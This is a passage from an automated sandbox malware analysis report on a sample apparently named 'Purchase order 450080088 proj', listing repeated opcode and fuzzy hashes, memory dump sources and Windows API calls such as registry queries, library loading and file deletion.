                                                  • Opcode ID: 54e849f5bdfa811bc8564bf3c327f159e3dd20e4e791e067768009b9c4ceb80e
                                                  • Instruction ID: 738643d8d30c226a6306fe5e55dc16b720d904a6076bdbc7f61b38776019dc8a
                                                  • Opcode Fuzzy Hash: 54e849f5bdfa811bc8564bf3c327f159e3dd20e4e791e067768009b9c4ceb80e
                                                  • Instruction Fuzzy Hash: 92E1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7e2a719f12aeb6c99ec39e9972813bd3703a99a4b89c35cb90b067bbe6284408
                                                  • Instruction ID: b9a76e2e7acaf3e36d785c03e7ee2f1bd9f205c3222cf54c6c38a932affeed19
                                                  • Opcode Fuzzy Hash: 7e2a719f12aeb6c99ec39e9972813bd3703a99a4b89c35cb90b067bbe6284408
                                                  • Instruction Fuzzy Hash: 39D1F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 037a8eccf677ec5aa62d6855dbb6bc02ecf879fcbff977a832c759f4c19763d5
                                                  • Instruction ID: 17868822077aa422101d689f8b8399420d88e24ffea95d27af125a6b52c36b85
                                                  • Opcode Fuzzy Hash: 037a8eccf677ec5aa62d6855dbb6bc02ecf879fcbff977a832c759f4c19763d5
                                                  • Instruction Fuzzy Hash: 03D1033890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: e50c9294c07f712142f445ec09ed0c94a0e6a0637751c519b54387a521421189
                                                  • Instruction ID: 9c1dfd135fe2b7d077dabf83f4e62976fe39ac1674ff89441746e8d54ef079f7
                                                  • Opcode Fuzzy Hash: e50c9294c07f712142f445ec09ed0c94a0e6a0637751c519b54387a521421189
                                                  • Instruction Fuzzy Hash: 8ED1E33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8c17e71b0894808f5573804d11bdad0427be1e7c1c0dd535da8260483d1fce97
                                                  • Instruction ID: e52436639158a64801bc8a49ffabe6a23e384de764ab209dd8cc4b3a323eac5c
                                                  • Opcode Fuzzy Hash: 8c17e71b0894808f5573804d11bdad0427be1e7c1c0dd535da8260483d1fce97
                                                  • Instruction Fuzzy Hash: 74C1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 41ef620ece961b5708a1807e2a1037b8c7a74adb04bfd3eb532b0905d79809c5
                                                  • Instruction ID: 73f638bec529b188a3cf06380c7b304c2977be4a3f86696f7d2e92e7bcdceaf7
                                                  • Opcode Fuzzy Hash: 41ef620ece961b5708a1807e2a1037b8c7a74adb04bfd3eb532b0905d79809c5
                                                  • Instruction Fuzzy Hash: 1FC1F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8422718609a28ccc9e290159a9bcce966141579af57211635fb92934f0f776cd
                                                  • Instruction ID: 993f498bfbbeaca0cde2d1497d6af97d779521a6d4f096be6a0fddbfd8aa1363
                                                  • Opcode Fuzzy Hash: 8422718609a28ccc9e290159a9bcce966141579af57211635fb92934f0f776cd
                                                  • Instruction Fuzzy Hash: 29C1033890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 3ab54784dbb80f6811f12cf4dfc7f1afc2e7fa3f987cccf28f73d6665d79e2ff
                                                  • Instruction ID: a57b898341597369312ac1a6a20339682b7647fd83169513e6b6b7bafb542daf
                                                  • Opcode Fuzzy Hash: 3ab54784dbb80f6811f12cf4dfc7f1afc2e7fa3f987cccf28f73d6665d79e2ff
                                                  • Instruction Fuzzy Hash: 71B1033890526CCFCB65EF60D888699BBB2BF49306F6041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: f188a6331279ca91461dc2b4baca4c6fde44b3d709e0d7f0dc942cc78a9c0f5d
                                                  • Instruction ID: bb05b912b95844b86c6220d5b032dafe6147ae167c6887c0d99244799abd1c8e
                                                  • Opcode Fuzzy Hash: f188a6331279ca91461dc2b4baca4c6fde44b3d709e0d7f0dc942cc78a9c0f5d
                                                  • Instruction Fuzzy Hash: 62B1133890526CCFCB65EF70D888699BBB2BF49306F6041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 4fc3a511e765764aefc5705998d635e7deb25d59ab503deccde11b21e11c684a
                                                  • Instruction ID: 35067ccdd36bdf52cdc08b0f51221bbe9e830c36482c0b28f3d68870579739a2
                                                  • Opcode Fuzzy Hash: 4fc3a511e765764aefc5705998d635e7deb25d59ab503deccde11b21e11c684a
                                                  • Instruction Fuzzy Hash: 4FB1123890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: afef5fedb70c76ec4b770e73b421b69950b219b9e927419b3641dcf366d9d98d
                                                  • Instruction ID: 61d0346df6600d4ecd9ffb61bc02254b3395983b9cdc8f12bb7076c2e4e34074
                                                  • Opcode Fuzzy Hash: afef5fedb70c76ec4b770e73b421b69950b219b9e927419b3641dcf366d9d98d
                                                  • Instruction Fuzzy Hash: 3BA1123890526CCFCB61EF74D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 5579054a9e11093663c4b87d86f89547130e236ab47e6c372802847d91a71968
                                                  • Instruction ID: e5aa3c669d3286aee159926dc2a6cc6adf908714b37ed54ffdcc10d8e9527ea4
                                                  • Opcode Fuzzy Hash: 5579054a9e11093663c4b87d86f89547130e236ab47e6c372802847d91a71968
                                                  • Instruction Fuzzy Hash: 5BA1133890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 682bf5c09a37d0f3c522ef7437002da926042cfd515a937ef882933d52b571e6
                                                  • Instruction ID: db574a5c13c9e2928db4d9cb166478453a6bf6ac1d8f458a9268dc1faa4a706a
                                                  • Opcode Fuzzy Hash: 682bf5c09a37d0f3c522ef7437002da926042cfd515a937ef882933d52b571e6
                                                  • Instruction Fuzzy Hash: 2491233890526CCFCB61EF70D888699BBB2BF49306F6041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 4d9cd09a3bfb81b9497aa32c1e7783766dc3106b942756f113dd5ad76efc821f
                                                  • Instruction ID: 646cd6bc572867690cb3ffea0b159d5ba49a99ffa529a257cc1bb2c0168d1382
                                                  • Opcode Fuzzy Hash: 4d9cd09a3bfb81b9497aa32c1e7783766dc3106b942756f113dd5ad76efc821f
                                                  • Instruction Fuzzy Hash: 3891133890526CCFCB65EF70D888699BBB2BF49306F5041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: e71c09e342a04686673f9fed632a14c2471a879090119c82c5a01c936a921188
                                                  • Instruction ID: 7c907ee1ce1d5cae8113f2eef6ee413488a9afd771017620da2281819cb60e6c
                                                  • Opcode Fuzzy Hash: e71c09e342a04686673f9fed632a14c2471a879090119c82c5a01c936a921188
                                                  • Instruction Fuzzy Hash: 8591233890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 2e12b108718460bd614e284fd1c28ab75d2f2f69cb2824cb2cd6e7e2e2d862c4
                                                  • Instruction ID: 67aff323c2a6fdc8a609153905874c62cb35f90decec53d56e666585577ae9e5
                                                  • Opcode Fuzzy Hash: 2e12b108718460bd614e284fd1c28ab75d2f2f69cb2824cb2cd6e7e2e2d862c4
                                                  • Instruction Fuzzy Hash: 1481233890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 58349880808885e567f326d515c4de9e57044da22ad3ae1fdf3ab6730e0f6ef3
                                                  • Instruction ID: 7aad461470463512acb219825d6ac81a66a01775be5b9758447864850373e803
                                                  • Opcode Fuzzy Hash: 58349880808885e567f326d515c4de9e57044da22ad3ae1fdf3ab6730e0f6ef3
                                                  • Instruction Fuzzy Hash: AD81133890526CCFCB61EF60D888699BBB2BF49306F5041E9E50AA7340CB356E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ea414f76b0abbe25c26b8514594378776b0b14b76825c65484e7288d39eede7b
                                                  • Instruction ID: 2086cd2a813251e00e6157225f9806767ede1d775c50c8f1d114817372b84502
                                                  • Opcode Fuzzy Hash: ea414f76b0abbe25c26b8514594378776b0b14b76825c65484e7288d39eede7b
                                                  • Instruction Fuzzy Hash: A471123890526CCFCB60EF64D888699BBB2BF49305F5041E9E50AA7340CB35AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 419ddba418130667bbbf38e6e5d62a25884a493fcfb364f8bd688449ae489758
                                                  • Instruction ID: d4f3111dac94ebfa41d5aa687e22a16b1ac4f49dfdf7beb2736141a17ec9b378
                                                  • Opcode Fuzzy Hash: 419ddba418130667bbbf38e6e5d62a25884a493fcfb364f8bd688449ae489758
                                                  • Instruction Fuzzy Hash: 4E71123890522CCFCB60EF64D98C699BBB2BF49306F5041E9E50AA7340CB35AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 9f3ccc34749ce6ea659915ad9099a6bf02569b6fd1c7cea9f051f8614069cc64
                                                  • Instruction ID: dc6dc69902270691794cad926451e24ce113edf8015752f6463cf3d81dee46ee
                                                  • Opcode Fuzzy Hash: 9f3ccc34749ce6ea659915ad9099a6bf02569b6fd1c7cea9f051f8614069cc64
                                                  • Instruction Fuzzy Hash: 2261023890522CCFCB65EF64D888699BBB2BF49305F5041D9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: fcbe2d525a901f77fd2d07a3d5c299bf8b83fabfd3e4a62467e8f2538426671b
                                                  • Instruction ID: 53a13478791fdde11e07ad264c54788a8cdee06c9e1459bac898aa665807e2e5
                                                  • Opcode Fuzzy Hash: fcbe2d525a901f77fd2d07a3d5c299bf8b83fabfd3e4a62467e8f2538426671b
                                                  • Instruction Fuzzy Hash: 6D610438A0522CCFCB65EF74D888699BBB2BF4A305F5041D9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 064B8139
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 064B7E7C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?), ref: 00FCC9BA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?), ref: 00FCC9BA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 064B8139
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 05BF6998
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 064B7E7C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
